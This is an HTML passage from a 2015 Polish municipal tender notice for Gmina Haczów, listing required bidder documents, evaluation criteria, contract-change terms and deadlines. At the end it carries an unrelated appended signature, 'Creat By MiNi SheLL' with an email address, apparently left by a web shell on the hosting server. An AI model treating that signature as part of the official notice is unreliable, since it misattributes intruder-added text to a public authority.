<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć:
a) osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych robót, 
b) danych adresowych  wykonawcy, 
c)wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: działania wojenne, rozruchy, klęska żywiołowa,
Możliwa  jest   również zmiana  wysokości  wynagrodzenia  wykonawcy   w  przypadku zmiany stawki podatku VAT, wysokości  minimalnego  wynagrodzenia  za  pracę  ustalonego   na  podstawie  art. 2  ust 3-5  ustawy  z  dnia  10  października 2002 r.  o minimalnym  wynagrodzeniu  za  pracę, zasad  podlegania  ubezpieczeniom  społecznym  lub ubezpieczeniu  zdrowotnemu  lub  wysokości  stawki  składki  na  ubezpieczenia   społeczne  lub    zdrowotne pod  warunkiem ze  w.w  zmiany  będą  miały  wpływ  na koszty  wykonania  zamówienia  przez  wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów, 36-213 Haczów nr  573, pokój  nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2015 godzina 10:00, miejsce: Urząd Gminy Haczów, 36-213 Haczów nr  573, pokój  nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com